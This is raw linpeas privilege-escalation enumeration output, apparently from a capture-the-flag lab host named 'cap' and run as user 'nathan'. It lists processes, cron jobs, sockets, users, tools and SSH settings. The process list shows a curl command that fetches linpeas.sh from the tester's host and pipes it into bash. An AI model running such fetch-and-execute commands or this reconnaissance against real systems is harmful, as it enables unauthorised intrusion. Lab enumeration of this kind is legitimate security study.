Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users                                                                                                             
nathan     19368  0.0  0.2   7020  5028 pts/0    Ss   13:59   0:00 -bash
nathan     19544  0.0  0.5  23544 10800 pts/0    S+   14:05   0:00  _ curl http://10.10.14.38/linpeas.sh
nathan     19545  0.8  0.2   7964  5884 pts/0    S+   14:05   0:00  _ bash
nathan     22771  0.0  0.1   7964  3940 pts/0    S+   14:06   0:00      _ bash
nathan     22775  0.0  0.1   7648  3236 pts/0    R+   14:06   0:00      |   _ ps fauxwww
nathan     22773  0.0  0.1   7964  2724 pts/0    R+   14:06   0:00      _ bash
nathan     22774  0.0  0.1   7964  2724 pts/0    S+   14:06   0:00      _ bash
nathan     19241  0.0  0.4  18520  9748 ?        Ss   13:59   0:00 /lib/systemd/systemd --user
nathan     22647  0.0  0.2   7108  4108 ?        Ss   14:06   0:00  _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory                                                                                            
gdm-password Not Found                                                                                                                                                                        
gnome-keyring-daemon Not Found                                                                                                                                                                
lightdm Not Found                                                                                                                                                                             
vsftpd Not Found                                                                                                                                                                              
apache2 Not Found                                                                                                                                                                             
sshd Not Found                                                                                                                                                                                
                                                                                                                                                                                              
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user                                                                                                                     
                                                                                                                                                                                              
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                                            
COMMAND     PID   USER   FD      TYPE             DEVICE SIZE/OFF       NODE NAME                                                                                                             

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths                                                                                                
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin                                                                                                                   

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs                                                                                                        
/usr/bin/crontab                                                                                                                                                                              
incrontab Not Found
-rw-r--r-- 1 root root    1042 Feb 13  2020 /etc/crontab                                                                                                                                      

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Jul 31  2020 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--  1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--  1 root root  190 Jul 31  2020 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x  2 root root 4096 May 31  2021 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x  1 root root  376 Dec  4  2019 apport
-rwxr-xr-x  1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x  1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x  1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x  1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x  1 root root  214 Apr  2  2020 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Jul 31  2020 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Jul 31  2020 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 May 23  2021 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x  1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x  1 root root  211 Apr  2  2020 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                                     
NEXT                        LEFT          LAST                        PASSED       UNIT                         ACTIVATES                                                                     
Thu 2024-11-07 14:31:18 UTC 24min left    Thu 2024-11-07 03:24:27 UTC 10h ago      apt-daily.timer              apt-daily.service             
Thu 2024-11-07 15:55:07 UTC 1h 48min left Thu 2024-11-07 03:45:22 UTC 10h ago      ua-messaging.timer           ua-messaging.service          
Thu 2024-11-07 21:04:51 UTC 6h left       Thu 2024-11-07 08:20:23 UTC 5h 46min ago motd-news.timer              motd-news.service             
Fri 2024-11-08 00:00:00 UTC 9h left       Thu 2024-11-07 03:23:29 UTC 10h ago      logrotate.timer              logrotate.service             
Fri 2024-11-08 00:00:00 UTC 9h left       Thu 2024-11-07 03:23:29 UTC 10h ago      man-db.timer                 man-db.service                
Fri 2024-11-08 00:10:49 UTC 10h left      Thu 2024-11-07 08:33:18 UTC 5h 33min ago fwupd-refresh.timer          fwupd-refresh.service         
Fri 2024-11-08 03:37:52 UTC 13h left      Thu 2024-11-07 03:37:52 UTC 10h ago      systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Fri 2024-11-08 06:21:27 UTC 16h left      Thu 2024-11-07 06:18:51 UTC 7h ago       apt-daily-upgrade.timer      apt-daily-upgrade.service     
Sun 2024-11-10 03:10:36 UTC 2 days left   Thu 2024-11-07 03:24:10 UTC 10h ago      e2scrub_all.timer            e2scrub_all.service           
Mon 2024-11-11 00:00:00 UTC 3 days left   Thu 2024-11-07 03:23:29 UTC 10h ago      fstrim.timer                 fstrim.service                
n/a                         n/a           n/a                         n/a          snapd.snap-repair.timer      snapd.snap-repair.service     

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                                     
                                                                                                                                                                                              
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services                                                                                                                   
/etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path                                                                                                 
You can't write on systemd PATH

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                                    
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request                                                                                   
/snap/core18/2066/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2066/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2066/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2074/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                                    
/org/kernel/linux/storage/multipathd                                                                                                                                                          
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance997.sock
  └─(Read )
/run/irqbalance/irqbalance997.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/user/1001/bus
  └─(Read Write)
/run/user/1001/gnupg/S.dirmngr
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
  └─(Read Write)
/run/user/1001/pk-debconf-socket
  └─(Read Write)
/run/user/1001/snapd-session-agent.socket
  └─(Read Write)
/run/user/1001/systemd/notify
  └─(Read Write)
/run/user/1001/systemd/private
  └─(Read Write)
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)
/var/snap/lxd/common/lxd/unix.socket

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                                      
NAME                          PID PROCESS USER CONNECTION    UNIT SESSION DESCRIPTION                                                                                                         
:1.0                            - -       -    -             -    -       -
:1.18                           - -       -    -             -    -       -
:1.2                            - -       -    -             -    -       -
:1.22                           - -       -    -             -    -       -
:1.28                           - -       -    -             -    -       -
:1.3                            - -       -    -             -    -       -
:1.4                            - -       -    -             -    -       -
:1.5                            - -       -    -             -    -       -
:1.6                            - -       -    -             -    -       -
:1.7                            - -       -    -             -    -       -
:1.8                            - -       -    -             -    -       -
com.ubuntu.LanguageSelector     - -       -    (activatable) -    -       -
com.ubuntu.SoftwareProperties   - -       -    (activatable) -    -       -
org.freedesktop.Accounts        - -       -    -             -    -       -
org.freedesktop.DBus            - -       -    -             -    -       -
org.freedesktop.PackageKit      - -       -    (activatable) -    -       -
org.freedesktop.PolicyKit1      - -       -    -             -    -       -
org.freedesktop.UPower          - -       -    -             -    -       -
org.freedesktop.bolt            - -       -    (activatable) -    -       -
org.freedesktop.fwupd           - -       -    (activatable) -    -       -
org.freedesktop.hostname1       - -       -    (activatable) -    -       -
org.freedesktop.locale1         - -       -    (activatable) -    -       -
org.freedesktop.login1          - -       -    -             -    -       -
org.freedesktop.network1        - -       -    -             -    -       -
org.freedesktop.resolve1        - -       -    -             -    -       -
org.freedesktop.systemd1        - -       -    -             -    -       -
org.freedesktop.thermald        - -       -    (activatable) -    -       -
org.freedesktop.timedate1       - -       -    (activatable) -    -       -
org.freedesktop.timesync1       - -       -    -             -    -       -
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                                      
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)                                                                        



                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                                                                                                           
                              ╚═════════════════════╝                                                                                                                                         
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information                                                                                                                           
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.235.149  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb0:2cd8  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb0:2cd8  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b0:2c:d8  txqueuelen 1000  (Ethernet)
        RX packets 48334  bytes 5934831 (5.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34069  bytes 6673170 (6.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 43832  bytes 3451192 (3.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 43832  bytes 3451192 (3.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Hostname, hosts and DNS
cap                                                                                                                                                                                           
127.0.0.1 localhost
127.0.0.1 cap

nameserver 127.0.0.53
options edns0 trust-ad

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                 
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                                                                                                             
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No                                                                                                                                                                                            
                                                                                                                                                                                              


 82  808k   82  665k    0     0  13409      0  0:01:01  0:00:50  0:00:11 13409                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                                                                                                           
                               ╚═══════════════════╝                                                                                                                                          
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                                                                                                                      
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)                                                                                                                                         

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                                                                  
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                                              
                                                                                                                                                                                              
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                              
Sorry, try again.                                                                                                                                                                             

bash: line 3207: get_current_user_privot_pid: command not found
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens                                                                                                        
ptrace protection is enabled (1)                                                                                                                                                              

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                                                    
                                                                                                                                                                                              
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                                               

╔══════════╣ Users with console
nathan:x:1001:1001::/home/nathan:/bin/bash                                                                                                                                                    
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                                                        
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(ftp) gid=118(ftp) groups=118(ftp)
uid=113(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

╔══════════╣ Login now
 14:06:37 up 10:43,  1 user,  load average: 0.17, 0.06, 0.02                                                                                                                                  
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
root     pts/0        Fri May 21 14:32:11 2021 - down                      (00:01)     10.10.14.7                                                                                             
root     tty1         Fri May 21 14:31:21 2021 - down                      (00:02)     0.0.0.0
reboot   system boot  Fri May 21 14:30:50 2021 - Fri May 21 14:33:53 2021  (00:03)     0.0.0.0
root     tty1         Fri May 21 13:43:26 2021 - down                      (00:47)     0.0.0.0
reboot   system boot  Fri May 21 13:40:52 2021 - Fri May 21 14:30:42 2021  (00:49)     0.0.0.0
root     tty1         Sat May 15 21:41:23 2021 - down                      (00:01)     0.0.0.0
lab      tty1         Sat May 15 21:40:56 2021 - Sat May 15 21:41:11 2021  (00:00)     0.0.0.0
reboot   system boot  Sat May 15 21:40:45 2021 - Sat May 15 21:42:37 2021  (00:01)     0.0.0.0

wtmp begins Sat May 15 21:40:29 2021

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                                                                                                                             
root             tty1                      Fri Jul 23 13:29:13 +0000 2021
nathan           pts/0    10.10.14.38      Thu Nov  7 13:59:21 +0000 2024

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
                                                                                                                                                                                              
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                                                                                                                                                                              


 94  808k   94  765k    0     0  15085      0  0:00:54  0:00:51  0:00:03 15211                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                                                                                                            
                             ╚══════════════════════╝                                                                                                                                         
╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                                                               
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                                  4:9.3.0-1ubuntu2                  amd64        GNU C++ compiler                                                                                      
ii  g++-9                                9.3.0-17ubuntu1~20.04             amd64        GNU C++ compiler
ii  gcc                                  4:9.3.0-1ubuntu2                  amd64        GNU C compiler
ii  gcc-9                                9.3.0-17ubuntu1~20.04             amd64        GNU C compiler
/usr/bin/gcc
/usr/bin/g++

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15  2019 /usr/share/doc/rsync/examples/rsyncd.conf                                                                                                            
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 31  2021 /etc/pam.d                                                                                                                                           
-rw-r--r-- 1 root root 2133 May 29  2020 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                                                                                                                          
drwxr-xr-x 2 root root 4096 May 23  2021 /etc/ldap

drwxr-xr-x 2 root root 32 May  7  2021 /snap/core18/2066/etc/ldap

drwxr-xr-x 2 root root 32 Jun 11  2021 /snap/core18/2074/etc/ldap


╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3559 Apr 19  2021 /snap/core18/2066/etc/cloud/cloud.cfg                                                                                                                
     lock_passwd: True
-rw-r--r-- 1 root root 3559 May 11  2021 /snap/core18/2074/etc/cloud/cloud.cfg
     lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 May  7  2021 /snap/core18/2066/usr/share/keyrings                                                                                                                  
drwxr-xr-x 2 root root 200 Jun 11  2021 /snap/core18/2074/usr/share/keyrings
drwxr-xr-x 2 root root 4096 May 23  2021 /usr/share/keyrings




╔══════════╣ Analyzing Cache Vi Files (limit 70)
                                                                                                                                                                                              
lrwxrwxrwx 1 root root 9 May 27  2021 /home/nathan/.viminfo -> /dev/null

╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr  2  2018 /snap/core18/2066/usr/share/bash-completion/completions/postfix                                                                                       

-rw-r--r-- 1 root root 675 Apr  2  2018 /snap/core18/2074/usr/share/bash-completion/completions/postfix

-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5850 Mar  6  2019 /etc/vsftpd.conf                                                                                                                                     
anonymous_enable
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18  2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 506 Mar  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 564 Mar  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb  2  2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable









╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                                                           
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc                                                                                                                                    
-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 /home/nathan/.bashrc
-rw-r--r-- 1 root root 3771 Apr  4  2018 /snap/core18/2066/etc/skel/.bashrc
-rw-r--r-- 1 root root 3771 Apr  4  2018 /snap/core18/2074/etc/skel/.bashrc





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 nathan nathan 807 Feb 25  2020 /home/nathan/.profile
-rw-r--r-- 1 root root 807 Apr  4  2018 /snap/core18/2066/etc/skel/.profile
-rw-r--r-- 1 root root 807 Apr  4  2018 /snap/core18/2074/etc/skel/.profile





╔══════════╣ Searching mysql credentials and exec
                                                                                                                                                                                              
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                                                                                                                                                                  
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                                              
                                                                                                                                                                                              
-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core18/2066/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core18/2074/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jan  6  2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2274 May 11  2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 May 11  2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 May 11  2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 May 11  2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                                                                                                                                
passwd file: /etc/passwd
passwd file: /snap/core18/2066/etc/pam.d/passwd
passwd file: /snap/core18/2066/etc/passwd
passwd file: /snap/core18/2066/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2066/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2066/var/lib/extrausers/passwd
passwd file: /snap/core18/2074/etc/pam.d/passwd
passwd file: /snap/core18/2074/etc/passwd
passwd file: /snap/core18/2074/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2074/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2074/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)                                                                                                                                                   
                                                                                                                                                                                              




-rw-r--r-- 1 root root 598 Sep 23  2020 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 170 Sep 23  2020 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 90 Sep 23  2020 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 562 Sep 23  2020 /etc/ssh/ssh_host_rsa_key.pub

PermitRootLogin yes
ChallengeResponseAuthentication no
